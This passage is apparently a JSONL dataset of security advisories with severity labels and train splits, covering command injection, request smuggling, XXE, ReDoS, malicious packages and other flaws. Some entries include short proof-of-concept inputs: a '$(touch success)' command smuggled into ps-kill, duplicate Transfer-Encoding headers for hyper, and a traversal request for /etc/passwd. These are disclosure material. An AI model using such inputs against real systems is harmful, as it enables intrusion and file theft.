ps-kill\n\n[Severity: CRITICAL]\n\nThis affects all versions of package ps-kill. If (attacker-controlled) user input is given to the kill function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization in the index.js file. \n\nPoC (provided by reporter): \n```js\nvar ps_kill = require('ps-kill');\nps_kill.kill('$(touch success)', function() {});\n```", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-03-19", "split": "train"} -{"id": "0868260e9ab695b03f92", "text": "Data races in multiqueue2\n\nAffected versions of this crate unconditionally implemented Send for types used in queue implementations (InnerSend, InnerRecv, FutInnerSend, FutInnerRecv).\n\nThis allows users to send non-Send types to other threads, which can lead to data race bugs or other undefined behavior.\n\nThe flaw was corrected in v0.1.7 by adding T: Send bound to to the Send impl of four data types explained above.", "text_raw": "Data races in multiqueue2\n\n[Severity: MEDIUM]\n\nAffected versions of this crate unconditionally implemented Send for types used in queue implementations (InnerSend, InnerRecv, FutInnerSend, FutInnerRecv).\n\nThis allows users to send non-Send types to other threads, which can lead to data race bugs or other undefined behavior.\n\nThe flaw was corrected in v0.1.7 by adding T: Send bound to to the Send impl of four data types explained above.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "647586aa613971aba8f5", "text": "Puma with proxy which forwards LF characters as line endings could allow HTTP request smuggling\n\n### Impact\n\nPrior to `puma` version 5.5.0, using `puma` with a proxy which forwards LF characters as line endings could allow HTTP request smuggling. A client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client.\n\nThis behavior (forwarding LF characters as line endings) is very uncommon amongst proxy servers, so we have graded the impact here as \"low\". Puma is only aware of a single proxy server which has this behavior.\n\nIf the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the proxy does not expect. If the proxy has reused the persistent connection to Puma to send another request for a different client, the second response from the first client will be sent to the second client.\n\n### Patches\n\nThis vulnerability was patched in Puma 5.5.1 and 4.3.9.\n\n### Workarounds\n\nThis vulnerability only affects Puma installations without any proxy in front.\n\nUse a proxy which does not forward LF characters as line endings.\n\nProxies which do not forward LF characters as line endings:\n\n* Nginx\n* Apache (>2.4.25)\n* Haproxy\n* Caddy\n* Traefik\n\n### Possible Breakage\n\nIf you are [dealing with legacy clients that want to send `LF` as a line ending](https://stackoverflow.com/questions/43574428/have-apache-accept-lf-vs-crlf-in-request-headers) in an HTTP header, this will cause those clients to receive a `400` error.\n\n### References\n\n* [HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling)\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [Puma](https://github.com/puma/puma)\n* See our [security policy](https://github.com/puma/puma/security/policy)", "text_raw": "Puma with proxy which forwards LF characters as line endings could allow HTTP request smuggling\n\n[Severity: LOW]\n\n### Impact\n\nPrior to `puma` version 5.5.0, using `puma` with a proxy which forwards LF characters as line endings could allow HTTP request smuggling. A client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client.\n\nThis behavior (forwarding LF characters as line endings) is very uncommon amongst proxy servers, so we have graded the impact here as \"low\". Puma is only aware of a single proxy server which has this behavior.\n\nIf the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the proxy does not expect. If the proxy has reused the persistent connection to Puma to send another request for a different client, the second response from the first client will be sent to the second client.\n\n### Patches\n\nThis vulnerability was patched in Puma 5.5.1 and 4.3.9.\n\n### Workarounds\n\nThis vulnerability only affects Puma installations without any proxy in front.\n\nUse a proxy which does not forward LF characters as line endings.\n\nProxies which do not forward LF characters as line endings:\n\n* Nginx\n* Apache (>2.4.25)\n* Haproxy\n* Caddy\n* Traefik\n\n### Possible Breakage\n\nIf you are [dealing with legacy clients that want to send `LF` as a line ending](https://stackoverflow.com/questions/43574428/have-apache-accept-lf-vs-crlf-in-request-headers) in an HTTP header, this will cause those clients to receive a `400` error.\n\n### References\n\n* [HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling)\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [Puma](https://github.com/puma/puma)\n* See our [security policy](https://github.com/puma/puma/security/policy)", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-10-12", "split": "train"} -{"id": "cb0a532f83a9fabcf286", "text": "HTTP Request Smuggling in hyper\n\n### Summary\n\nhyper's HTTP server code had a flaw that incorrectly understands some requests with multiple transfer-encoding headers to have a chunked payload, when it should have been rejected as illegal. This combined with an upstream HTTP proxy that understands the request payload boundary differently can result in \"request smuggling\" or \"desync attacks\".\n\n### Vulnerability\n\nThe flaw was introduced in https://github.com/hyperium/hyper/commit/26417fc24a7d05df538e0f39239b373c5c3d61f6, released in v0.12.0.\n\nConsider this example request:\n\n```\nPOST /yolo HTTP/1.1\nTransfer-Encoding: chunked\nTransfer-Encoding: cow\n```\n\nThis request *should* be rejected, according to RFC 7230, since it has a `Transfer-Encoding` header, but after folding, it does not end in `chunked`. hyper would notice the `chunked` in the first line, and then check the second line, and thanks to a missing boolean assignment, *not* set the error condition. hyper would treat the payload as being `chunked`. By differing from the spec, it is possible to send requests like these to endpoints that have different HTTP implementations, with different interpretations of the payload semantics, and cause \"desync attacks\".\n\nThere are several parts of the spec that must also be checked, and hyper correctly handles all of those. Additionally, hyper's *client* does not allow sending requests with improper headers, so the misunderstanding cannot be propagated further.\n\nRead more about desync attacks: https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn\n\n### Impact\n\nTo determine if vulnerable, all these things must be true:\n\n- **Using hyper as an HTTP *server*.** The client is not affected.\n- **Using HTTP/1.1.** HTTP/2 does not use `transfer-encoding`.\n- **Using a vulnerable HTTP proxy upstream to hyper.** If an upstream proxy correctly rejects the illegal transfer-encoding headers, the desync attack cannot succeed. If there is *no* proxy upstream of hyper, hyper cannot *start* the desync attack, as the client will repair the headers before forwarding.\n\n### Patches\n\nWe have released and backported the following patch versions:\n\n- v0.14.3\n- v0.13.10\n\n### Workarounds\n\nBesides upgrading hyper, you can take the following options:\n\n- Reject requests that contain a `transfer-encoding` header.\n- Ensure any upstream proxy handles `transfer-encoding` correctly.\n\n### Credits\n\nThis issue was initially reported by ZeddYu Lu From Qi An Xin Technology Research Institute.", "text_raw": "HTTP Request Smuggling in hyper\n\n[Severity: MEDIUM]\n\n### Summary\n\nhyper's HTTP server code had a flaw that incorrectly understands some requests with multiple transfer-encoding headers to have a chunked payload, when it should have been rejected as illegal. This combined with an upstream HTTP proxy that understands the request payload boundary differently can result in \"request smuggling\" or \"desync attacks\".\n\n### Vulnerability\n\nThe flaw was introduced in https://github.com/hyperium/hyper/commit/26417fc24a7d05df538e0f39239b373c5c3d61f6, released in v0.12.0.\n\nConsider this example request:\n\n```\nPOST /yolo HTTP/1.1\nTransfer-Encoding: chunked\nTransfer-Encoding: cow\n```\n\nThis request *should* be rejected, according to RFC 7230, since it has a `Transfer-Encoding` header, but after folding, it does not end in `chunked`. hyper would notice the `chunked` in the first line, and then check the second line, and thanks to a missing boolean assignment, *not* set the error condition. hyper would treat the payload as being `chunked`. By differing from the spec, it is possible to send requests like these to endpoints that have different HTTP implementations, with different interpretations of the payload semantics, and cause \"desync attacks\".\n\nThere are several parts of the spec that must also be checked, and hyper correctly handles all of those. Additionally, hyper's *client* does not allow sending requests with improper headers, so the misunderstanding cannot be propagated further.\n\nRead more about desync attacks: https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn\n\n### Impact\n\nTo determine if vulnerable, all these things must be true:\n\n- **Using hyper as an HTTP *server*.** The client is not affected.\n- **Using HTTP/1.1.** HTTP/2 does not use `transfer-encoding`.\n- **Using a vulnerable HTTP proxy upstream to hyper.** If an upstream proxy correctly rejects the illegal transfer-encoding headers, the desync attack cannot succeed. If there is *no* proxy upstream of hyper, hyper cannot *start* the desync attack, as the client will repair the headers before forwarding.\n\n### Patches\n\nWe have released and backported the following patch versions:\n\n- v0.14.3\n- v0.13.10\n\n### Workarounds\n\nBesides upgrading hyper, you can take the following options:\n\n- Reject requests that contain a `transfer-encoding` header.\n- Ensure any upstream proxy handles `transfer-encoding` correctly.\n\n### Credits\n\nThis issue was initially reported by ZeddYu Lu From Qi An Xin Technology Research Institute.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "b442e06ec80690124b94", "text": "Cross-Site Request Forgery in express-cart\n\nThe express-cart package through 1.1.10 for Node.js allows CSRF.", "text_raw": "Cross-Site Request Forgery in express-cart\n\n[Severity: HIGH]\n\nThe express-cart package through 1.1.10 for Node.js allows CSRF.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-30", "split": "train"} -{"id": "51e28ed4ce7d036e95d9", "text": "HTTP Host Header Injection\n\n### Problem\nIt has been discovered that TYPO3 CMS is susceptible to host spoofing due to improper validation of the HTTP _Host_ header. TYPO3 uses the HTTP _Host_ header, for example, to generate absolute URLs during the frontend rendering process. Since the host header itself is provided by the client, it can be forged to any value, even in a name-based virtual hosts environment.\n\nThis vulnerability is the same as described in [TYPO3-CORE-SA-2014-001 (CVE-2014-3941)](https://typo3.org/security/advisory/typo3-core-sa-2014-001/). A regression, introduced during TYPO3 v11 development, led to this situation. The already existing setting _$GLOBALS['TYPO3_CONF_VARS']['SYS']['trustedHostsPattern']_ (used as an effective mitigation strategy in previous TYPO3 versions) was not evaluated anymore, and reintroduced the vulnerability.\n\n### Solution\nUpdate your instance to TYPO3 version 11.5.0 which addresses the problem described.\n\n### Credits\nThanks to TYPO3 framework merger Benjamin Franzke who reported and fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2021-015](https://typo3.org/security/advisory/typo3-core-sa-2021-015)\n* [CVE-2014-3941](https://nvd.nist.gov/vuln/detail/CVE-2014-3941) reintroduced in TYPO3 v11.0.0", "text_raw": "HTTP Host Header Injection\n\n[Severity: MEDIUM]\n\n### Meta\n* CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:F/RL:O/RC:C` (3.5)\n\n### Problem\nIt has been discovered that TYPO3 CMS is susceptible to host spoofing due to improper validation of the HTTP _Host_ header. TYPO3 uses the HTTP _Host_ header, for example, to generate absolute URLs during the frontend rendering process. Since the host header itself is provided by the client, it can be forged to any value, even in a name-based virtual hosts environment.\n\nThis vulnerability is the same as described in [TYPO3-CORE-SA-2014-001 (CVE-2014-3941)](https://typo3.org/security/advisory/typo3-core-sa-2014-001/). A regression, introduced during TYPO3 v11 development, led to this situation. The already existing setting _$GLOBALS['TYPO3_CONF_VARS']['SYS']['trustedHostsPattern']_ (used as an effective mitigation strategy in previous TYPO3 versions) was not evaluated anymore, and reintroduced the vulnerability.\n\n### Solution\nUpdate your instance to TYPO3 version 11.5.0 which addresses the problem described.\n\n### Credits\nThanks to TYPO3 framework merger Benjamin Franzke who reported and fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2021-015](https://typo3.org/security/advisory/typo3-core-sa-2021-015)\n* [CVE-2014-3941](https://nvd.nist.gov/vuln/detail/CVE-2014-3941) reintroduced in TYPO3 v11.0.0", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-10-05", "split": "train"} -{"id": "18e0dec5bff730eeb0ce", "text": "BuddyPress privilege escalation via REST API\n\n### Impact\nIt's possible for a non-privileged, regular user to obtain administrator rights by exploiting an issue in the BuddyPress REST API members endpoint.\n\n### Patches\nThe vulnerability has been fixed in BuddyPress 7.2.1. Existing installations of the plugin should be updated to this version to mitigate the issue.\n\n### References\nhttps://buddypress.org/2021/03/buddypress-7-2-1-security-release/\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [HackerOne](https://hackerone.com/wordpress)", "text_raw": "BuddyPress privilege escalation via REST API\n\n[Severity: HIGH]\n\n### Impact\nIt's possible for a non-privileged, regular user to obtain administrator rights by exploiting an issue in the BuddyPress REST API members endpoint.\n\n### Patches\nThe vulnerability has been fixed in BuddyPress 7.2.1. Existing installations of the plugin should be updated to this version to mitigate the issue.\n\n### References\nhttps://buddypress.org/2021/03/buddypress-7-2-1-security-release/\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [HackerOne](https://hackerone.com/wordpress)", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-10-06", "split": "train"} -{"id": "47ca3cab7a6d64dd89c6", "text": "Manx cms.xml 1.0.1 (simplexml_load_file()) Directory Traversal Vulnerability", "text_raw": "Manx cms.xml 1.0.1 (simplexml_load_file()) Directory Traversal Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2011-11-28", "split": "train"} -{"id": "4570865390e0979b060d", "text": "XML External Entity (XXE) vulnerability in codelibs fess\n\ncodelibs fess version before commit faa265b contains a XML External Entity (XXE) vulnerability in GSA XML file parser that can result in Disclosure of confidential data, denial of service, SSRF, port scanning. This attack appear to be exploitable via specially crafted GSA XML files. This vulnerability appears to have been fixed in after commit faa265b.", "text_raw": "XML External Entity (XXE) vulnerability in codelibs fess\n\n[Severity: CRITICAL]\n\ncodelibs fess version before commit faa265b contains a XML External Entity (XXE) vulnerability in GSA XML file parser that can result in Disclosure of confidential data, denial of service, SSRF, port scanning. This attack appear to be exploitable via specially crafted GSA XML files. This vulnerability appears to have been fixed in after commit faa265b.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-12-20", "split": "train"} -{"id": "04ed1beb3ea53b11da76", "text": "ReDoS via long UserAgent header in ua-parser\n\nAffected versions of `ua-parser` are vulnerable to regular expression denial of service when given a specially crafted `User-Agent` header.\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different, functionally equivalent package such as [useragent](https://www.npmjs.com/package/useragent).", "text_raw": "ReDoS via long UserAgent header in ua-parser\n\n[Severity: HIGH]\n\nAffected versions of `ua-parser` are vulnerable to regular expression denial of service when given a specially crafted `User-Agent` header.\n\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different, functionally equivalent package such as [useragent](https://www.npmjs.com/package/useragent).", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-24", "split": "train"} -{"id": "b8185cc67081e7776b15", "text": "ASP.NET Core Information Disclosure Vulnerability\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 5.0, .NET Core 3.1 and .NET Core 2.1. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nAn information disclosure vulnerability exists in .NET 5.0, .NET Core 3.1 and .NET Core 2.1 where a JWT token is logged if it cannot be parsed.\n\n### Patches\n\n* If you're using .NET 5.0, you should download and install Runtime 5.0.9 or SDK 5.0.206 (for Visual Studio 2019 v16.8) or SDK 5.0.303 (for Visual Studio 2019 V16.10) from https://dotnet.microsoft.com/download/dotnet-core/5.0.\n\n* If you're using .NET Core 3.1, you should download and install Runtime 3.1.18 or SDK 3.1.118 (for Visual Studio 2019 v16.4) or 3.1.412 (for Visual Studio 2019 v16.7 or later) from https://dotnet.microsoft.com/download/dotnet-core/3.1.\n\n* If you're using .NET Core 2.1, you should download and install Runtime 2.1.29 or SDK 2.1.525 (for Visual Studio 2019 v15.9) or 2.1.817 from https://dotnet.microsoft.com/download/dotnet-core/2.1.\n\n* If your application is using .NET Core 2.1 running on .NET Framework see the [Updating .NET Core 2.1 on .NET Framework](#updating-2.1) section below.\n\n### Updating .NET Core 2.1 on .NET Framework\nIf you are running .NET Core 2.1 on .NET Framework you need to check your projects for dependencies and update them accordingly.\n\n#### Direct dependencies\n\nDirect dependencies are discoverable by examining your `csproj` file. They can be fixed by [editing the project file](#fixing-direct-dependencies) or using NuGet to update the dependency.\n\n#### Transitive dependencies\n\nTransitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package `Contoso.Utility` which, in turn, depends on `Contoso.Internals` and you add the `Contoso.Utility` package to your project now your project has a direct dependency on `Contoso.Utility` and, because `Contoso.Utility` depends 'Contoso.Internals', your application gains a transitive dependency on the `Contoso.Internals` package.\n\nTransitive dependencies are reviewable in two ways:\n\n* In the Visual Studio Solution Explorer window, which supports searching.\n* By examining the `project.assets.json` file contained in the obj directory of your project for `csproj` based projects\n\nThe `project.assets.json` files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies.\n\nThere are two ways to view transitive dependencies. You can either [use Visual Studio’s Solution Explorer](#vs-solution-explorer), or you can review [the `project.assets.json` file](#project-assets-json)).\n\n##### Using Visual Studio Solution Explorer\n\nTo use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the [vulnerable package](#affected-software) and make a note of the version numbers of any results you find.\n\nFor example, search for `Microsoft.AspNetCore.Authentication.JwtBearer` and update the package to the latest version\n\n##### Manually reviewing project.assets.json\n\nOpen the *project.assets.json* file from your project’s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file.\nVisual Studio and Visual Studio Code provide JSON friendly editing.\n\nSearch the *project.assets.json* file for the [vulnerable package](#affected-software), using the format `packagename/` for each of the package names from the preceding table. If you find the assembly name in your search:\n\n* Examine the line on which they are found, the version number is after the `/`.\n* Compare to the [vulnerable versions table](#affected-software).\n\nFor example, a search result that shows `Microsoft.AspNetCore.Authentication.JwtBearer/2.1.0` is a refe", "text_raw": "ASP.NET Core Information Disclosure Vulnerability\n\n[Severity: MEDIUM]\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 5.0, .NET Core 3.1 and .NET Core 2.1. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nAn information disclosure vulnerability exists in .NET 5.0, .NET Core 3.1 and .NET Core 2.1 where a JWT token is logged if it cannot be parsed.\n\n### Patches\n\n* If you're using .NET 5.0, you should download and install Runtime 5.0.9 or SDK 5.0.206 (for Visual Studio 2019 v16.8) or SDK 5.0.303 (for Visual Studio 2019 V16.10) from https://dotnet.microsoft.com/download/dotnet-core/5.0.\n\n* If you're using .NET Core 3.1, you should download and install Runtime 3.1.18 or SDK 3.1.118 (for Visual Studio 2019 v16.4) or 3.1.412 (for Visual Studio 2019 v16.7 or later) from https://dotnet.microsoft.com/download/dotnet-core/3.1.\n\n* If you're using .NET Core 2.1, you should download and install Runtime 2.1.29 or SDK 2.1.525 (for Visual Studio 2019 v15.9) or 2.1.817 from https://dotnet.microsoft.com/download/dotnet-core/2.1.\n\n* If your application is using .NET Core 2.1 running on .NET Framework see the [Updating .NET Core 2.1 on .NET Framework](#updating-2.1) section below.\n\n### Updating .NET Core 2.1 on .NET Framework\nIf you are running .NET Core 2.1 on .NET Framework you need to check your projects for dependencies and update them accordingly.\n\n#### Direct dependencies\n\nDirect dependencies are discoverable by examining your `csproj` file. They can be fixed by [editing the project file](#fixing-direct-dependencies) or using NuGet to update the dependency.\n\n#### Transitive dependencies\n\nTransitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package `Contoso.Utility` which, in turn, depends on `Contoso.Internals` and you add the `Contoso.Utility` package to your project now your project has a direct dependency on `Contoso.Utility` and, because `Contoso.Utility` depends 'Contoso.Internals', your application gains a transitive dependency on the `Contoso.Internals` package.\n\nTransitive dependencies are reviewable in two ways:\n\n* In the Visual Studio Solution Explorer window, which supports searching.\n* By examining the `project.assets.json` file contained in the obj directory of your project for `csproj` based projects\n\nThe `project.assets.json` files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies.\n\nThere are two ways to view transitive dependencies. You can either [use Visual Studio’s Solution Explorer](#vs-solution-explorer), or you can review [the `project.assets.json` file](#project-assets-json)).\n\n##### Using Visual Studio Solution Explorer\n\nTo use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the [vulnerable package](#affected-software) and make a note of the version numbers of any results you find.\n\nFor example, search for `Microsoft.AspNetCore.Authentication.JwtBearer` and update the package to the latest version\n\n\n##### Manually reviewing project.assets.json\n\nOpen the *project.assets.json* file from your project’s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file.\nVisual Studio and Visual Studio Code provide JSON friendly editing.\n\nSearch the *project.assets.json* file for the [vulnerable package](#affected-software), using the format `packagename/` for each of the package names from the preceding table. If you find the assembly name in your search:\n\n* Examine the line on which they are found, the version number is after the `/`.\n* Compare to the [vulnerable versions table](#affected-software).\n\nFor example, a search result that shows `Microsoft.AspNetCore.Authentication.JwtBe", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "e79c4537a95da64511b8", "text": "Malicious Package in juffer-xor\n\nVersion 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "text_raw": "Malicious Package in juffer-xor\n\n[Severity: CRITICAL]\n\nVersion 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "67006815f2089972d448", "text": "SQL Injection and Cross-site Scripting in class-validator\n\nIn TypeStack class-validator, `validate()` input validation can be bypassed because certain internal attributes can be overwritten via a conflicting name. Even though there is an optional `forbidUnknownValues` parameter that can be used to reduce the risk of this bypass, this option is not documented and thus most developers configure input validation in the vulnerable default manner. With this vulnerability, attackers can launch SQL Injection or XSS attacks by injecting arbitrary malicious input.\n\nThe default settings for `forbidUnknownValues` has been changed to `true` in 0.14.0.\n\nNOTE: a software maintainer agrees with the \"is not documented\" finding but suggests that much of the responsibility for the risk lies in a different product.", "text_raw": "SQL Injection and Cross-site Scripting in class-validator\n\n[Severity: CRITICAL]\n\nIn TypeStack class-validator, `validate()` input validation can be bypassed because certain internal attributes can be overwritten via a conflicting name. Even though there is an optional `forbidUnknownValues` parameter that can be used to reduce the risk of this bypass, this option is not documented and thus most developers configure input validation in the vulnerable default manner. With this vulnerability, attackers can launch SQL Injection or XSS attacks by injecting arbitrary malicious input.\n\nThe default settings for `forbidUnknownValues` has been changed to `true` in 0.14.0.\n\nNOTE: a software maintainer agrees with the \"is not documented\" finding but suggests that much of the responsibility for the risk lies in a different product.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-10-12", "split": "train"} -{"id": "e245e53542b051faa273", "text": "Undefined behavior via `nullptr` reference binding in sparse matrix multiplication\n\n### Impact\nThe [code for sparse matrix multiplication](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/sparse_matmul_op.cc#L954-L1086) is vulnerable to undefined behavior via binding a reference to `nullptr`:\n\n```python\nimport tensorflow as tf\n\ntf.raw_ops.SparseMatMul(\n a=[[1.0,1.0,1.0]],\n b=[[],[],[]],\n transpose_a=False,\n transpose_b=False,\n a_is_sparse=False, \n b_is_sparse=True)\n```\n\nThis occurs whenever the dimensions of `a` or `b` are 0 or less. In the case on one of these is 0, an empty output tensor should be allocated (to conserve the invariant that output tensors are always allocated when the operation is successful) but nothing should be written to it (that is, we should return early from the kernel implementation). Otherwise, attempts to write to this empty tensor would result in heap OOB access.\n\n### Patches\nWe have patched the issue in GitHub commit [e6cf28c72ba2eb949ca950d834dd6d66bb01cfae](https://github.com/tensorflow/tensorflow/commit/e6cf28c72ba2eb949ca950d834dd6d66bb01cfae).\n\nThe fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Undefined behavior via `nullptr` reference binding in sparse matrix multiplication\n\n[Severity: HIGH]\n\n### Impact\nThe [code for sparse matrix multiplication](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/sparse_matmul_op.cc#L954-L1086) is vulnerable to undefined behavior via binding a reference to `nullptr`:\n\n```python\nimport tensorflow as tf\n \ntf.raw_ops.SparseMatMul(\n a=[[1.0,1.0,1.0]],\n b=[[],[],[]],\n transpose_a=False,\n transpose_b=False,\n a_is_sparse=False, \n b_is_sparse=True)\n```\n\nThis occurs whenever the dimensions of `a` or `b` are 0 or less. In the case on one of these is 0, an empty output tensor should be allocated (to conserve the invariant that output tensors are always allocated when the operation is successful) but nothing should be written to it (that is, we should return early from the kernel implementation). Otherwise, attempts to write to this empty tensor would result in heap OOB access.\n\n### Patches\nWe have patched the issue in GitHub commit [e6cf28c72ba2eb949ca950d834dd6d66bb01cfae](https://github.com/tensorflow/tensorflow/commit/e6cf28c72ba2eb949ca950d834dd6d66bb01cfae).\n\nThe fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-11-10", "split": "train"} -{"id": "937b7e9840cb33120b11", "text": "Regular Expression Denial of Service in marked\n\nVersions 0.3.3 and earlier of `marked` are affected by a regular expression denial of service ( ReDoS ) vulnerability when passed inputs that reach the `em` inline rule.\n\n## Recommendation\n\nUpdate to version 0.3.4 or later.", "text_raw": "Regular Expression Denial of Service in marked\n\n[Severity: HIGH]\n\nVersions 0.3.3 and earlier of `marked` are affected by a regular expression denial of service ( ReDoS ) vulnerability when passed inputs that reach the `em` inline rule.\n\n\n\n## Recommendation\n\nUpdate to version 0.3.4 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "14572a5854acd742f22c", "text": "Information Exposure in Snyk Broker\n\nAll versions of snyk-broker before 4.73.1 are vulnerable to Information Exposure. It logs private keys if logging level is set to DEBUG.", "text_raw": "Information Exposure in Snyk Broker\n\n[Severity: HIGH]\n\nAll versions of snyk-broker before 4.73.1 are vulnerable to Information Exposure. It logs private keys if logging level is set to DEBUG.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-06-03", "split": "train"} -{"id": "d8eb9198d7551c3a8cad", "text": "FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation", "text_raw": "FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2021-09-27", "split": "train"} -{"id": "b76254c836a18586276e", "text": "Chakra Scripting Engine Memory Corruption Vulnerability\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability. The security update addresses the vulnerability by modifying how the Chakra scripting engine handles objects in memory.", "text_raw": "Chakra Scripting Engine Memory Corruption Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability. The security update addresses the vulnerability by modifying how the Chakra scripting engine handles objects in memory.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-03-29", "split": "train"} -{"id": "7954cf10477fe8387cad", "text": "Directory Traversal in badjs-sourcemap-server\n\nAffected versions of `badjs-sourcemap-server` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "text_raw": "Directory Traversal in badjs-sourcemap-server\n\n[Severity: HIGH]\n\nAffected versions of `badjs-sourcemap-server` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and 